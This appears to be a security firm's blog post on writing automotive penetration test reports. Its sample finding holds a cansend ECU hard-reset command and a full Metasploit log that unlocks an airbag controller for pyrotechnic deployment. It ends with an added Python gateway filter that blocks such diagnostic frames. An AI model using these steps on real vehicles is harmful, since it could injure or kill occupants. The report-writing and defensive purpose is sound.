Are you a car hacker and at the same time a penetration tester? Well then, you must be one if you have stumbled upon this article. If not, I guess you are preparing to be one.
At Nullforge, we pride ourselves on an automated penetration test report so as not to give hassle to our clients and to our very own penetration testers. Yes, we have our own tracker, and we want to share how to write good documentation for one of your findings, especially if it is related to car hacking and automotive security.
The first thing to note when writing a penetration test report for an automotive client, where the targets are the vehicles, is that you need to treat the report the same way you would a network or web application penetration testing report.
To create a report that has an edge, so that clients will not forget your company, document the replication steps so that they are as easy as possible to follow. Always include a proof of concept. For example:
1. Connect your hardware to the sensor that has two twisted wires (CAN High and CAN Low)
2. Execute the following command to send an ECU hard reset:
cansend can0 7DF#0211010000000000
The steps should be clear and concise. The impact should also be highlighted, ideally before the replication steps.
Since there is no secret to it, because it is just like creating a normal pentest report, we will focus on how to document one finding as an example. Here is a sample write-up (this is just a sample):
Vulnerability Details
Vulnerability: Vehicle Authentication Mechanism Bypass or Gateway Bypass
CVSS: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
Description: Injecting UDS messages that result in vehicle manipulation, an ECU reset, or getting the gateway to pass a message through is a security issue. UDS requests sent via the regular OBD socket or interface should be protected and filtered by the gateway.
Corrective Actions: Implement a security gateway that filters disallowed or malicious frames. Cross-correlate and validate sensor values across multiple sensors to improve the data integrity of CAN bus messages. The order of messages from a single Electronic Control Unit (ECU) can also be used to detect anomalies: CAN messages from an ECU should always be seen in a specific order, as they are transmitted one after the other based on message priority.
Replication Steps
The airbag detonation algorithm allows injury to passenger-car occupants via predictable Security Access (SA) data on the internal CAN bus (or the OBD connector). It was found that, through the OBD-II port, you can send CAN frames to deploy airbags; such frames should be filtered or not allowed via OBD. Here is a successful unlock and prep-to-deploy of the pyrotechnic devices in a target vehicle using Metasploit's Pyrotechnical Device Deployment Tool (PDT) post module:
msf > use auxiliary/server/local_hwbridge
msf auxiliary(local_hwbridge) > set uripath /
uripath => /
msf auxiliary(local_hwbridge) > run
[*] Auxiliary module running as background job 0.
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://10.0.2.4:8080/
[*] Server started.
msf auxiliary(local_hwbridge) > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > run
[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-12-17 10:41:27 -0600
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true} Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE: You are about to leave the matrix. All actions performed on this hardware bridge
[!] could have real world consequences. Use this module in a controlled testing
[!] environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions -i 1
[*] Starting interaction with 1...
hwbridge >
hwbridge > run post/hardware/automotive/pdt canbus=can0
[*] Gathering Data...
[*] VIN: 5555
[*] Loop info (1 pyrotechnic devices):
[*] 69 | battery clamp main battery
[*] | Deployment Status: Fail ()
[*] Number of PCUs in vehicle | 1
[*] Info About First PCU
[*] Address format this PCU(s) | 11 bit normal addressing
[*] Number of pyrotechnic charges | 1
[*] Version of ISO26021 standard | 1
[*] ACL type | CAN only
[*] ACL Type version | 1
[*]
[*] Switching to Diagnostic Session 0x04...
[*] Getting Security Access Seed...
[*] Success. Seed: ["01", "CF", "00", "00", "00"]
[*] Attempting to unlock device...
[*] Success!
[!] Warning! You are now able to start the deployment of airbags in this vehicle
[!] *** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***
References:
https://www.cvedetails.com/cve/CVE-2017-14937/
https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts
And so there it is for the replication steps: always make sure to point out where the attack surface is and what tools were used to create the proof of concept.
This applies not only to a pentest report but also to writing a good report for a bug bounty program. It is easy for the triager to replicate your findings if your report is detailed, easy to follow, and includes a proof of concept and an impact statement.
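The corrective action above recommends a security gateway that filters diagnostic frames coming in from the OBD port. The following is an added example (not code from the original post or from Nullforge) of how such a filter decides what to forward: it parses candump-style lines, decodes the ISO-TP single-frame header and UDS service ID, and applies an assumed allow/deny policy. The sample capture is constructed; its second line is the ECU hard-reset frame used in the replication steps.

```python
# Added example: minimal model of an OBD-side security gateway filter.
# Policy (which SIDs are blocked or allowed) is an illustrative assumption,
# not an OEM rule set. Addressing follows ISO 15765-4 (0x7DF functional,
# 0x7E0-0x7E7 physical request IDs).
DIAG_REQUEST_IDS = {0x7DF} | set(range(0x7E0, 0x7E8))

# UDS services that should not reach internal ECUs from the public OBD port
BLOCKED_SIDS = {
    0x10: "DiagnosticSessionControl",
    0x11: "ECUReset",
    0x27: "SecurityAccess",
    0x2E: "WriteDataByIdentifier",
    0x31: "RoutineControl",
}
# Legacy OBD emissions services (modes 0x01-0x0A) are legitimately used via OBD
ALLOWED_SIDS = set(range(0x01, 0x0B))

def parse_candump(line):
    """'can0  7DF   [8]  02 11 01 00 00 00 00 00' -> (0x7DF, b'\\x02\\x11...')"""
    _iface, can_id, _dlc, *data = line.split()
    return int(can_id, 16), bytes(int(b, 16) for b in data)

def classify(can_id, data):
    """Return ('forward' | 'drop', reason) for one frame seen on the OBD side."""
    if can_id not in DIAG_REQUEST_IDS:
        return "forward", "not a diagnostic request ID"
    if not data:
        return "drop", "empty diagnostic frame"
    if data[0] >> 4 != 0:                      # ISO-TP PCI type 0 = single frame
        return "drop", "multi-frame ISO-TP from OBD port not permitted"
    length = data[0] & 0x0F                    # payload length of the single frame
    if length == 0 or length > len(data) - 1:
        return "drop", "malformed single frame length"
    sid = data[1]
    if sid in BLOCKED_SIDS:
        sub = f" sub=0x{data[2]:02X}" if length > 1 else ""
        return "drop", f"{BLOCKED_SIDS[sid]} (SID 0x{sid:02X}{sub}) not allowed from OBD"
    if sid in ALLOWED_SIDS:
        return "forward", f"OBD service 0x{sid:02X}"
    return "drop", f"unlisted SID 0x{sid:02X} (default deny)"

def filter_log(lines):
    """Classify every candump line; returns [(id, action, reason), ...]."""
    return [(hex(cid), *classify(cid, d)) for cid, d in map(parse_candump, lines)]

# Constructed sample capture from the OBD side of the gateway
SAMPLE = [
    "can0  7DF   [8]  02 01 05 00 00 00 00 00",   # OBD mode 01 PID 05: coolant temp
    "can0  7DF   [8]  02 11 01 00 00 00 00 00",   # UDS ECUReset hardReset (from the post)
    "can0  7E0   [8]  02 27 01 00 00 00 00 00",   # UDS SecurityAccess requestSeed
    "can0  1A0   [8]  12 34 00 00 00 00 00 00",   # ordinary sensor broadcast, not diagnostic
]
```

Running `filter_log(SAMPLE)` forwards the emissions query and the sensor broadcast and drops the ECUReset and SecurityAccess requests with a reason string that can go straight into the finding's evidence.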